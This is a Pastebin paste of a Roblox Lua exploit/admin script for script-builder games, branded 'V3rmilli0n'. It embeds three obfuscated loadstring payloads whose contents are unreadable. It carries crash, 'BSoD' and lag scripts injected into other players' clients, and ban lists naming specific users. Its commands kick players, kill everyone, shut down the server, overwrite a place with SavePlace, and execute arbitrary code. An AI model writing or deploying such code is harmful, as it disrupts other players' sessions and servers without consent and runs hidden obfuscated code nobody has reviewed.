Advertisement
Guest User

Untitled

a guest
Jun 26th, 2016
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 59.73 KB | None | 0 0
  1. local z={[")"]=0,["@"]=1,["*"]=2,["^"]=3,["+"]=4,["="]=5,["-"]=6,["("]=7,["~"]=8,["_"]=9,["$"]=10,["?"]=11,["&"]=12,["%"]=13,["!"]=14,["#"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  2. "((@-_-+(~*_*$)&+#-^-@-&-)=&-@-_(=-*()*%^)*(-@-%-=-$^^(=-*(-(_-^-=-~A*)=&-@-_(=-*(^(**_*!*&+#-^-@-&-)=&-@-_(=-*($)^(^-*(_-)(+(!*)=@-*(=-!-+()*%^)*#=#=#=-=^^*(%-+=@-*-^(#=#=#=$)+=@-*-^()*%^)*?(%($)^+%-+-^()*%^)*?(%($)?-=-_()*%^)A*?^**$)^-~-@-+((-=(_-)*%^)*+(*(=(=-$))(*(#-*-=-%-#-+-=-)*%^)*--@-&-^(=-$)^-#-!-!-=-^-+(_-#-!-)*%^)*!-_-&-$)*+_()(@-^(^()*%^)*--@-&-^($))*$)-=^^*(%-%+#-+-=-&-)*%^)*_+!-^(+(@-!-^-=-!*!-=-((~***%+#-+-=-&-**&*)*(=#-*(?-^()(@-^-=-_*$)-=^^*(%-%+#-+-=-&-!*!+@-%-=-)*%^)***-=+=@-*-^(**$)^=#-=(*(^-=-!+@-%-=-)*%^)***++^=#-=(*(^-=-**"
  3. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  4.  
  5. Banlist = {"d","NilScripter","OTHR"}
  6. BSoDBanList = {"rogers888","cappertron20","GOLDC3PO","rabbidog","NoobsAttacks","manofthebase44"}
  7.  
  8.  
  9. function Connect(player)
  10. if game.Players[player] then
  11. if not Players[player.Name] then
  12. NewLS(CrashSource,player.Backpack)
  13. table.insert(Players,player.Name)
  14. Output('Connected | '..player.Name,__)
  15. end
  16. end
  17. end
  18.  
  19.  
  20. function Crash(name)
  21. name = tostring(name or "nil")
  22. local t = Instance.new("StringValue")
  23. t.Name = "DISC: "..name
  24. t.Parent = game.Lighting
  25. game:GetService("Debris"):AddItem(t,1)
  26. end
  27.  
  28. ConnectSource = [=[
  29. wait()
  30. script:ClearAllChildren()
  31. wait()
  32. script.Parent = nil
  33. wait()
  34. Player = game:service'Players'.LocalPlayer
  35. wait()
  36. while wait(0.1) do --this is actually the nilcrash
  37. if game.Lighting:findFirstChild("DISC: nil") then
  38. if Player.Parent == nil then
  39. repeat Delay(0, wait) until false
  40. end
  41. end
  42. if game.Lighting:findFirstChild("DISC: "..Player.Name) then
  43. repeat Delay(0, wait) until false
  44. end
  45. if game.Lighting:findFirstChild("DISC: all") then
  46. repeat Delay(0, wait) until false
  47. end
  48. end
  49. ]=]
  50.  
  51.  
  52. BSoDSource = [==[
  53. game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
  54. wait(0)
  55. script.Parent = nil
  56. plr = game:GetService("Players").LocalPlayer
  57. local plrgui = plr:findFirstChild("PlayerGui")
  58. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  59. while plr.Parent == game:GetService("Players") do
  60. wait()
  61. for i = 1, 1000 do
  62. local sc = Instance.new("ScreenGui",plrgui)
  63. local fr = Instance.new("TextLabel",sc)
  64. fr.Text = "BSoD'd By V3rmilli0n be happy xd"
  65. fr.Size = UDim2.new(1, 0, 1, 0)
  66. fr.FontSize = "Size48"
  67. end
  68. end
  69. ]==]
  70.  
  71.  
  72. LagSource = [[
  73. wait()
  74. script.Parent = game:service'TeleportService'
  75. CC = workspace.CurrentCamera
  76. game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
  77.  
  78. RS = game:service("RunService")
  79. PG = game.Players.LocalPlayer.PlayerGui
  80. C = game.Players.LocalPlayer.Character
  81. function Lag()
  82. coroutine.resume(coroutine.create(function()
  83. while wait() do
  84. M = Instance.new("Message",CC)
  85. M.Text = tick()*math.floor(5%4*21)
  86. H = Instance.new("Hint",CC)
  87. H.Text = 'yo u got BSoD-D By V3rmilli0n ;-)'
  88. SG=Instance.new("ScreenGui",PG)
  89. FR=Instance.new("Frame",SG)
  90. FR.Size = UDim2.new(500,500,500,500)
  91. while wait() do
  92. FR.BackgroundColor3 = Color3.new(math.random(0,255),math.random(0,255),math.random(0,255))
  93. end
  94. P=Instance.new("Part",CC)
  95. E=Instance.new("Explosion",P)
  96. E.BlastRadius=math.huge
  97. E.Position=P.Position
  98. F=Instance.new("Fire",P)
  99. S=Instance.new("Smoke",P)
  100. P.CFrame = CC.Focus
  101. P.Anchored = true
  102. P.CanCollide = false
  103. P.AncestryChanged:connect(function()Lag()end)
  104. for _,v in pairs(C:GetChildren()) do pcall(function()v.Anchored=true end) end
  105. end
  106. end))
  107. end
  108. RS.Stepped:connect(function()for i=1,10 do Lag()Lag()Lag()end end)
  109. ]]
  110.  
  111.  
  112.  
  113.  
  114. coroutine.resume(coroutine.create(function()
  115. while wait(3) do
  116. if game:GetService("Players").Name ~= "Players" then
  117. game:GetService("Players").Name = "Players"
  118. end
  119. end
  120. end))
  121.  
  122. function Dismiss()
  123. for i = 1, 10 do
  124. for i = 1, #Tabs do
  125. table.remove(Tabs, i)
  126. if V3rmModel then
  127. V3rmModel:ClearAllChildren()
  128. end end end
  129. end
  130.  
  131. function AddCmd(Name,Say,Desc,Func)
  132. table.insert(Cmds,{["Name"] = Name,["Say"] = Say,["Desc"] = Desc,["Func"] = Func})
  133. end
  134.  
  135.  
  136.  
  137. found = false
  138.  
  139. coroutine.wrap(function()
  140. while found == false do
  141. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
  142. for _,scriptinworkspace in pairs(workspace:children()) do
  143. if scriptinworkspace then
  144. if scriptinworkspace:IsA("Script") then
  145. if scriptinworkspace:FindFirstChild(SourceName) then
  146. newScript = scriptinworkspace:Clone()
  147. wait(0.2)
  148. newScript.Name = "NewScript"
  149. newScript.Disabled = true
  150. newScript:FindFirstChild(SourceName).Value = ""
  151. Output("Source found", __)
  152. found = true
  153. break
  154. end
  155. end
  156. end
  157. end
  158. wait()
  159. end
  160. end)()
  161.  
  162. AddCmd("Unpunish player","unpunish","Restore the player's character",
  163. function(plrs)
  164. for _, plr in pairs(plrs) do
  165. if plr then
  166. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  167. end
  168. end
  169. end
  170. )
  171.  
  172. function NewS(sourcevalue, parent)
  173. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  174. NS(sourcevalue, parent)
  175. else
  176. if newScript then
  177. local scr = newScript:Clone()
  178. if scr:FindFirstChild(SourceName) then
  179. if scr:FindFirstChild(SourceName) then
  180. scr:FindFirstChild(SourceName).Value = sourcevalue
  181. scr.Parent = parent
  182. wait(0.5)
  183. scr.Disabled = false
  184. return scr
  185. end
  186. end
  187. end
  188. end
  189. end
  190.  
  191. sorcery = script:Clone()
  192.  
  193.  
  194.  
  195. Services = {
  196. game;
  197. game:service'Workspace';
  198. game:service'Lighting';
  199. game:service'StarterGui';
  200. game:service'StarterPack';
  201. game:service'Players';
  202. };
  203.  
  204. AddCmd("Go nil","gn","Go to nil player mode",
  205. function()
  206. LocalPlayer.Parent = nil
  207. appear(CFrame.new(0,25,0))
  208. local a = Char:Clone()
  209. a.Torso.CFrame = CFrame.new(0,25,0)
  210. a.Parent = workspace
  211. LocalPlayer.Character = a
  212. workspace.CurrentCamera.CameraType = "Custom"
  213. workspace.CurrentCamera.CameraSubject = a.Humanoid
  214. wait(5)
  215. SmoothMovement()
  216. end
  217. )
  218.  
  219. function SmoothMovement()
  220. if char ~= nil then char = nil end
  221. wait()
  222. if LocalPlayer.Character.Parent == nil then return end
  223. if LocalPlayer.Character == nil then return end
  224. char = LocalPlayer.Character
  225. char.Torso.Anchored = true
  226. Mouse.KeyDown:connect(function(kai)
  227. if kai == "w" then
  228. key = "w"
  229. elseif kai == "s" then
  230. key = "s"
  231. elseif kai == "a" then
  232. key = "a"
  233. elseif kai == "d" then
  234. key = "d"
  235. end
  236. end)
  237. Mouse.KeyUp:connect(function(kai)
  238. if kai == "w" then
  239. key = nil
  240. elseif kai == "s" then
  241. key = nil
  242. elseif kai == "a" then
  243. key = nil
  244. elseif kai == "d" then
  245. key = nil
  246. end
  247. end)
  248. while wait() do
  249. if char == nil then break end
  250. if key == "w" then
  251. if char == nil then break end
  252. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(0,0,-0.5)
  253. elseif key == "s" then
  254. if char == nil then break end
  255. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(0,0,0.5)
  256. elseif key == "a" then
  257. if char == nil then break end
  258. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(-0.5,0,0)
  259. char.Torso.CFrame = char.Torso.CFrame * CFrame.Angles(0,0.5,0)
  260. elseif key == "d" then
  261. if char == nil then break end
  262. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(0.5,0,0)
  263. char.Torso.CFrame = char.Torso.CFrame * CFrame.Angles(0,-0.5,0)
  264. end
  265. end
  266. end
  267.  
  268. AddCmd("Rejoin yourself","rjm","Rejoin yourself even if you are nil",
  269. function()
  270. if SourceName ~= "source" then
  271. game:service'TeleportService':Teleport(game.PlaceId)
  272. else
  273. end
  274. end
  275. )
  276.  
  277. function Explore(part)
  278. Dismiss()
  279. if part == nil then
  280. for _,v in pairs(Services) do
  281. Output(v.Name,nil,function() Explore(v) end)
  282. end
  283. else
  284. for _,v in pairs(part:children()) do
  285. Output(v.Name,nil,function() Explore(v) end)
  286. end
  287. wait()
  288. Output("Currently exploring: "..part.Name)
  289. Output("Class name: "..part.ClassName)
  290. Output("Destroy",function() part:Destroy() Explore(part.Parent) end)
  291. Output("Remove",function() part:remove() Explore(part.Parent) end)
  292. end
  293. end
  294.  
  295. AddCmd("Explore","explore","Explore the game",
  296. function()
  297. Explore()
  298. end
  299. )
  300.  
  301. AddCmd("Kick player","kick","Kick a player",
  302. function(plrs)
  303. for _, plr in pairs(plrs) do
  304. if plr and plr.Backpack then
  305. plr:Remove()
  306. end
  307. end
  308. end
  309. )
  310.  
  311. function NewLS(sourcevalue, parent)
  312. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  313. NLS(sourcevalue, parent)
  314. else
  315. local NS = sorcery:Clone()
  316. NS.Name = "NewLocal"
  317. local Source = NS:findFirstChild(SourceName)
  318. if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  319. Source.Value = sourcevalue
  320. NS.Parent = parent
  321. NS.Disabled = false
  322. return NS
  323. end
  324. end
  325.  
  326. Clothes = {}
  327.  
  328. for _,Item in pairs(LocalPlayer.Character:GetChildren()) do
  329. if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  330. table.insert(Clothes,Item:Clone())
  331. end
  332. end
  333. for i,v in pairs(LocalPlayer.Character:GetChildren()) do
  334. if v:IsA("BodyColors") then
  335. body = v
  336. torsocolor = body.TorsoColor
  337. leftlegcolor = body.LeftLegColor
  338. rightlegcolor = body.RightLegColor
  339. leftarmcolor = body.LeftArmColor
  340. rightarmcolor = body.RightArmColor
  341. headcolor = body.HeadColor
  342. end
  343. end
  344.  
  345. mouse = LocalPlayer:GetMouse()
  346.  
  347. mouse.KeyDown:connect(function(key)
  348. if key == "z" then
  349. game:service'StarterGui':SetCoreGuiEnabled(4, true)
  350. end
  351. end)
  352.  
  353. AddCmd("chat;on/off","chat","ChatGUI on/off",
  354. function(plrs, msg)
  355. if msg == "off" then
  356. chatgui = false
  357. elseif msg == "on" then
  358. chatgui = true
  359. end
  360. end
  361. )
  362.  
  363. AddCmd("Set WalkSpeed","ws","Set the walkspeed of player",
  364. function(plrs, msg)
  365. local keypos = msg:find(key)
  366. local targPlayers = msg:sub(1,keypos-1)
  367. local plrs = getPlayers(targPlayers)
  368. local speed = msg:sub(tonumber(keypos+1))
  369. for _,v in pairs(plrs) do
  370. if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
  371. v.Character:findFirstChild("Humanoid").WalkSpeed = speed
  372. end
  373. end
  374. end
  375. )
  376.  
  377.  
  378. Bad_Char = ""
  379.  
  380. function chatgui(msg)
  381. if not chatgui then return end
  382. if probemode == false then
  383. if LocalPlayer.Character:findFirstChild("Head") then
  384. mainPart = LocalPlayer.Character:findFirstChild("Head")
  385. end
  386. end
  387. if probemode == true then
  388. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  389. mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")
  390. end
  391. end
  392. local bg = Instance.new("BillboardGui", mainPart)
  393. bg.Adornee = mainPart
  394. bg.Name = "CHATGUIBG"
  395. bg.Size = UDim2.new(4, 0, 2.5, 0)
  396. bg.StudsOffset = Vector3.new(-4, 2, 0)
  397. local bg2 = Instance.new("BillboardGui", mainPart)
  398. bg2.Adornee = mainPart
  399. bg2.Name = "CHATGUIBG2"
  400. bg2.Size = UDim2.new(4, 0, 2.5, 0)
  401. bg2.StudsOffset = Vector3.new(-4, 4.5, 0)
  402. local text = Instance.new("TextLabel", bg)
  403. text.Size = UDim2.new(3, 0, 0.5, 0)
  404. text.FontSize = "Size18"
  405. text.TextScaled = true
  406. text.BackgroundColor3 = Color3.new(0,0,0)
  407. text.TextTransparency = 0
  408. text.BackgroundTransparency = 0
  409. text.TextTransparency = 0
  410. text.TextStrokeTransparency = 0
  411. text.Font = "Arial"
  412. text.TextColor = BrickColor.new("Really red")
  413. text.Text = " "
  414. Message = msg:sub(1)
  415. if #Message >50 then return end
  416. for i = 0, #Message, 1 do
  417. wait(0.01)
  418. text.Text = string.gsub(""..LocalPlayer.Name.."; "..Message:sub(0, i),'fuck','fuck')
  419. end
  420. wait()
  421. coroutine.resume(coroutine.create(function()
  422. for i = 0, 5, 0.05 do
  423. if bg ~= nil then
  424. if bg2 ~= nil then
  425. wait()
  426. bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0)
  427. end
  428. bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0)
  429. end
  430. end
  431. end))
  432. for i=text.TextTransparency,1,0.02 do
  433. wait()
  434. text.TextTransparency = i
  435. text.TextStrokeTransparency = i
  436. end
  437. if bg == nil then return end
  438. bg:Destroy()
  439. if bg2 == nil then return end
  440. bg2:Destroy()
  441. end
  442.  
  443. LocalPlayer.Chatted:connect(chatgui)
  444.  
  445. AddCmd("Commands","cmds","Show the list of commands",
  446. function()
  447. Dismiss()
  448. for i, v in pairs(Cmds) do
  449. Output(v["Name"],
  450. function()
  451. Output("Description: "..v["Desc"], __)
  452. Output("Usage: "..v["Say"], __)
  453. Output("Name: "..v["Name"], __)
  454. end)
  455. end
  456. end
  457. )
  458.  
  459. AddCmd("Rejoin player","rej","Rejoin the player",
  460. function(plrs)
  461. for _, plr in pairs(plrs) do
  462. if plr and plr.Backpack then
  463. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  464. end
  465. end
  466. end
  467. )
  468.  
  469. AddCmd("Clean workspace","clean","Clean the lag nobs made",
  470. function()
  471. for a,b in pairs(game.Workspace:GetChildren()) do
  472. if not game.Players:GetPlayerFromCharacter(b) and b.Name ~= 'Base' and b.Name ~= 'Camera' then
  473. pcall(function() b:Destroy() end)
  474. end
  475. end
  476. if game.Workspace:findFirstChild('Base') == nil then
  477. local Base = Instance.new("Part",Game.Workspace)
  478. Base.Name = "Base"
  479. Base.Anchored = true
  480. Base.Locked = true
  481. Base.BrickColor = BrickColor.new("Bright green")
  482. Base.Size = Vector3.new(2048,2,2048)
  483. Base.CFrame = CFrame.new(0,0,0)
  484. end
  485. Output('You have cleaned workspace!')
  486. end
  487. )
  488.  
  489. AddCmd("Execute", "exe","Execute a LocalScript for admin",
  490. function(plrs, msg)
  491. a,b = ypcall(function()
  492. loadstring(msg)()
  493. end) if not a then Output(b,"Bright red") end
  494. end
  495. )
  496.  
  497. AddCmd("Anchored", "anchor","Anchor all parts",
  498. function()
  499. g = game.Workspace:GetChildren () do
  500. for i = 1, #g do
  501. if g[i].ClassName == "Part" then
  502. g[i].Anchored = true else if
  503. g[i].ClassName == "Model" then
  504. y = g[i]:GetChildren ()
  505. for i = 1, #y do
  506. if y[i].ClassName == "Part" then
  507. y[i].Anchored = true
  508. end
  509. end
  510. end
  511. end
  512. end
  513. end
  514. end
  515. )
  516.  
  517. AddCmd("unanchor", "unanchor","unanchor all parts",
  518. function()
  519. g = game.Workspace:GetChildren () do
  520. for i = 1, #g do
  521. if g[i].ClassName == "Part" then
  522. g[i].Anchored = false else if
  523. g[i].ClassName == "Model" then
  524. y = g[i]:GetChildren ()
  525. for i = 1, #y do
  526. if y[i].ClassName == "Part" then
  527. y[i].Anchored = false
  528. end
  529. end
  530. end
  531. end
  532. end
  533. end
  534. end
  535. )
  536.  
  537. AddCmd("Admin a player","vtabs","Give admin to a player",
  538. function(plrs)
  539. for _, plr in pairs(plrs) do
  540. if plr and plr.Backpack then
  541. script.Parent = plr.Backpack
  542. Output("You gave admin to: "..plr.Name, __)
  543. end
  544. end
  545. end
  546. )
  547.  
  548. AddCmd("AFK","afk","Ping yourself as afk",
  549. function()
  550. Dismiss()
  551. for i = 1,8 do
  552. wait()
  553. Output(''..LocalPlayer.Name.." is afk")
  554. end
  555. end
  556. )
  557.  
  558. AddCmd("Back","back","Ping yourself as back",
  559. function()
  560. Dismiss()
  561. for i = 1,8 do
  562. wait()
  563. Output(''..LocalPlayer.Name.." is back bby")
  564. end
  565. wait(3)
  566. Dismiss()
  567. end
  568. )
  569.  
  570. AddCmd("Ban a player","ban","Kicks a player when he enters",
  571. function(plrs, msg)
  572. for _,v in pairs(plrs) do
  573. if v then
  574. table.insert(Banlist,v.Name)
  575. Output('Banned | '..v.Name,__)
  576. else
  577. Output(Error)
  578. end
  579. end
  580. end
  581. )
  582.  
  583. local z={["@"]=0,["*"]=1,["$"]=2,["%"]=3,[")"]=4,["("]=5,["~"]=6,["!"]=7,["-"]=8,["_"]=9,["="]=10,["+"]=11,["#"]=12,["&"]=13,["?"]=14,["^"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  584. "*))~)~%)&~)~-A$_)?A~^~$$#A$~!_~?A~^~$$#A$_~?A~^~@$@A!?~%!@$+~$$#$=@~~(!?~%~)!_~^~?~-$_$=@))_~%!&~_~%!%!-$_$=@~~^~$!@$_~@$&%@$*%#$$%@$)~^~=@!!*~_~)!-$_$=@^)(!)!@!(!)!-A$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-A$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-$$$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-$$$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-$$$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@(~?~)~=@(~?~)~=@_$"
  585. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  586.  
  587. AddCmd("Fix Lighting","lfix","Fix the Lighting ",
  588. function()
  589. function dtr()
  590. local sk = game.Lighting:findFirstChild("Sky")
  591. if sk ~= nil then
  592. sk:Remove()
  593. end
  594. game.Lighting.FogEnd = 10011111111
  595. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  596. game.Lighting.TimeOfDay = "14:00:00"
  597. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  598. game.Lighting.Brightness = 1
  599. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  600. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  601. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  602. end
  603.  
  604. dtr()
  605.  
  606. game.Lighting.Changed:connect(dtr)
  607. end
  608. )
  609.  
  610. AddCmd("Kill all","ka","everyone go die die",
  611. function()
  612. for i,v in pairs(game.Players:GetChildren()) do if v.Character then v.Character:BreakJoints() end end
  613. end
  614. )
  615.  
  616. AddCmd("Set SkyBox","vbox","et Skybox l0l",
  617. function()
  618. function getAll(obj)
  619. for i, v in pairs(obj:getChildren()) do
  620. if v:IsA("BasePart") then
  621. v.Anchored = false
  622. v.BrickColor = BrickColor.new(0)
  623. bv = Instance.new("BodyVelocity")
  624. bv.Parent = v
  625. bv.maxForce = Vector3.new(100000000,100000000,100000000)
  626. local s = Instance.new("SelectionBox")
  627. s.Color = BrickColor.random()
  628. s.Adornee = v
  629. s.Parent = v
  630. s.Transparency = (0.4)
  631. end
  632. getAll(v)
  633. end
  634. end
  635. getAll(workspace)
  636. game.Lighting.TimeOfDay = "07:00:00"
  637. game.Lighting.Ambient = Color3.new(0,0,0)
  638. sky = Instance.new("Sky")
  639. sky.Parent = game.Lighting
  640. sky.SkyboxBk = "http://www.roblox.com/asset/?id=157702855"
  641. sky.SkyboxDn = "http://www.roblox.com/asset/?id=157702855"
  642. sky.SkyboxFt = "http://www.roblox.com/asset/?id=157702855"
  643. sky.SkyboxLf = "http://www.roblox.com/asset/?id=157702855"
  644. sky.SkyboxRt = "http://www.roblox.com/asset/?id=157702855"
  645. sky.SkyboxUp = "http://www.roblox.com/asset/?id=157702855"
  646. end
  647. )
  648.  
  649. local z={["&"]=0,["%"]=1,["="]=2,["!"]=3,["*"]=4,["+"]=5,["?"]=6,["-"]=7,["~"]=8,["#"]=9,["$"]=10,[")"]=11,["^"]=12,["("]=13,["_"]=14,["@"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  650.  
  651. "??+-_?!?*-#?@?_?&=!?=-+?%?*-+?!+@?+-_?*?~=#A*#=$&#&!+@?+-_?*?(!#*_?!-*-%?_?!?+?_=_?+?--~A=!+@?+-_?*?==^=-*%?(?+?)+==-+@?=-)?!-&-%?!?+?==(+#=$&#&!+@?+-_?*?)+==_*%?(?+?==(+(!~A=!++?=-?-+?=-@+!+#-!-*-+?(?@+!+@?+-_?*?==#=$&#&!+@?+-_?*?)+==&+#?*-!?~?==(+(!~=%!#=$&#&!+@?+-_?*?)+==!+@?+-_?*?#**?==(+(!~===~?*-*-&-$!@=@=------_==-@?=?^?@?~-_=!?@?(?@=%?!-!-+?*-@=@!#?*?(!==_=_=*-@?_?+-(?=?+?=-~=#***#=#=$&#&!+@?+-_?*?)+==?+@?^?+-(?+?==(+(!~=&!_=+!#=$&#&--%?#?*-~=#=$&#&!+@?+-_?*?$!&+^?%?#-~=#=$&+?_?*?"
  652.  
  653. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  654.  
  655.  
  656.  
  657.  
  658. function ShowMusicList()
  659.  
  660. Dismiss()
  661.  
  662. Output("Michael Jackson - Slave To The Rhythm",function()
  663.  
  664. CheckForExistingSound()
  665.  
  666. createSound(158179091)
  667.  
  668. end)
  669.  
  670. Output("Tsunami Hardstyle",function()
  671.  
  672. CheckForExistingSound()
  673.  
  674. createSound(142720946)
  675.  
  676. end)
  677.  
  678. Output("Peanut Butter Jelly Time!?!!?!?",function()
  679.  
  680. CheckForExistingSound()
  681.  
  682. createSound(142851579)
  683.  
  684. end)
  685.  
  686. Output("Headhunterz - Dragonborn",function()
  687.  
  688. CheckForExistingSound()
  689.  
  690. createSound(145060711)
  691.  
  692. end)
  693.  
  694. Output("Gas Pedal",function()
  695.  
  696. CheckForExistingSound()
  697.  
  698. createSound(142489916)
  699.  
  700. end)
  701.  
  702. Output("Eminem - Rap God",function()
  703.  
  704. CheckForExistingSound()
  705.  
  706. createSound(143647605)
  707.  
  708. end)
  709.  
  710. Output("Haddaway - What Is Love",function()
  711.  
  712. CheckForExistingSound()
  713.  
  714. createSound(142383642)
  715.  
  716. end)
  717.  
  718. Output("Dj Swoom - I'm Blue",function()
  719.  
  720. CheckForExistingSound()
  721.  
  722. createSound(150526348)
  723.  
  724. end)
  725.  
  726. Output("Skrillex - Bangarang",function()
  727.  
  728. CheckForExistingSound()
  729.  
  730. createSound(142319852)
  731.  
  732. end)
  733.  
  734. Output("Hey Brother",function()
  735.  
  736. CheckForExistingSound()
  737.  
  738. createSound(144364636)
  739.  
  740. end)
  741.  
  742. Output("Drop That NaeNae Everyone!",function()
  743.  
  744. CheckForExistingSound()
  745.  
  746. createSound(146054931)
  747.  
  748. end)
  749.  
  750. Output("Troll Guy - Trololo",function()
  751.  
  752. CheckForExistingSound()
  753.  
  754. createSound(131857877)
  755.  
  756. end)
  757.  
  758. Output("The Pina Colada Song",function()
  759.  
  760. CheckForExistingSound()
  761.  
  762. createSound(145221203)
  763.  
  764. end)
  765.  
  766. Output("Bomb Awey",function()
  767.  
  768. CheckForExistingSound()
  769.  
  770. createSound(150137290)
  771.  
  772. end)
  773.  
  774. Output("Guns N' Roses-Paradise City",function()
  775.  
  776. CheckForExistingSound()
  777.  
  778. createSound(149446267)
  779.  
  780. end)
  781.  
  782. Output("Eminem - Not Afraid",function()
  783.  
  784. CheckForExistingSound()
  785.  
  786. createSound(131149175)
  787. end)
  788.  
  789. Output("One Direction - Story Of My Life",function()
  790.  
  791. CheckForExistingSound()
  792.  
  793. createSound(139446118)
  794.  
  795. end)
  796.  
  797. Output("Bastille - Pompeii",function()
  798.  
  799. CheckForExistingSound()
  800.  
  801. createSound(144635805)
  802.  
  803. end)
  804.  
  805. Output("M.I.A. - Paper Planes",function()
  806.  
  807. CheckForExistingSound()
  808.  
  809. createSound(146076224)
  810.  
  811. end)
  812.  
  813. Output("Muse-Madness",function()
  814.  
  815. CheckForExistingSound()
  816.  
  817. createSound(143343171)
  818.  
  819. end)
  820.  
  821. Output("Turn Down for What",function()
  822.  
  823. CheckForExistingSound()
  824.  
  825. createSound(132935524)
  826.  
  827. end)
  828.  
  829. Output("Let it Go",function()
  830.  
  831. CheckForExistingSound()
  832.  
  833. createSound(150320143)
  834.  
  835.  
  836. end)
  837.  
  838. Output("Talk Dirty ",function() CheckForExistingSound() createSound(148952593)
  839. end)
  840. end
  841. function CheckForExistingSound()
  842.  
  843. for _,Child in pairs(Game["Workspace"]:GetChildren()) do
  844.  
  845. if(Child["ClassName"]==("Sound"))then
  846.  
  847. Child:Pause()
  848.  
  849. Child["PlayOnRemove"]=(false);
  850.  
  851. wait()
  852.  
  853. Child:Destroy()
  854.  
  855. end
  856.  
  857. end
  858.  
  859. end
  860.  
  861. AddCmd("Musiclist","mlist","Shows the Possible Sounds to Play",
  862.  
  863. function()
  864.  
  865. ShowMusicList()
  866.  
  867. end)
  868.  
  869. AddCmd("Shutdown","sd","Shuts the server down",
  870. function()
  871. Output("Shutting down server!","Really red")
  872. for k,v in pairs(game:GetService("Players"):GetPlayers()) do v:Destroy() end
  873. game.Workspace.Terrain:Clear()
  874. wait(1)
  875. game.Workspace:ClearAllChildren()
  876. game:GetService("Players").PlayerAdded:connect(function(p) p:Destroy() end)
  877. end
  878. )
  879.  
  880. AddCmd("RuinSB","rsb","Ruins a not-saveplace protected scriptbuilder",
  881. function()
  882. if SourceName == "source" then
  883. Output("This is Alakazards scriptbuilder, can't use SavePlace here!","Really red")
  884. else
  885. NewS([[game:SavePlace()]],Workspace)
  886. end
  887. end
  888. )
  889.  
  890. AddCmd("Respawn","respawn","Respawn player",
  891. function(plrs)
  892. for _,plr in pairs(plrs) do
  893. if plr then
  894. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  895. end
  896. end
  897. end
  898. )
  899.  
  900. AddCmd("Connect","connect","Connect a player",
  901. function(plrs)
  902. for _,plr in pairs(plrs) do
  903. if plr and plr.Backpack then
  904. Connect(plr)
  905. end
  906. end
  907. end
  908. )
  909.  
  910. AddCmd("Night","night","Makes it night",
  911. function()
  912. game.Lighting.TimeOfDay = "00:00:00"
  913. end
  914. )
  915.  
  916. AddCmd("Day","day","Makes it day",
  917. function()
  918. game.Lighting.TimeOfDay = "12:00:00"
  919. end
  920. )
  921.  
  922. AddCmd("Disc","dc","Disconnects a player form the game",
  923. function(plrs)
  924. for _,plr in pairs(plrs) do
  925. if plr and plr.Backpack then
  926. NewLS([[local lp = game.Players.LocalPlayer;lp.Parent = nil;wait();lp.Parent = game.Players]],plr.Backpack)
  927. end
  928. end
  929. end)
  930.  
  931. AddCmd("LocalScript","ls","LocalScript",
  932. function(nothing, msg)
  933. if LocalPlayer.Parent ~= nil then
  934. NewLS(msg, LocalPlayer.Backpack)
  935. end
  936. end
  937. )
  938.  
  939. AddCmd("Playerinfo","pinfo","Shows info on a player",
  940. function(plrs)
  941. for _,plr in pairs(plrs) do
  942. if plr then
  943. Output("Age: "..plr.AccountAge,"noncolar")
  944. Output("Membership: "..plr.MembershipType.Name,"Hot pink")
  945. Output("Player: "..plr.Name,"Really red")
  946. Output("Id: "..plr.userId,"New Yeller")
  947. Output("Camera Mode: "..plr.CameraMode.Name,"Dark green")
  948. end
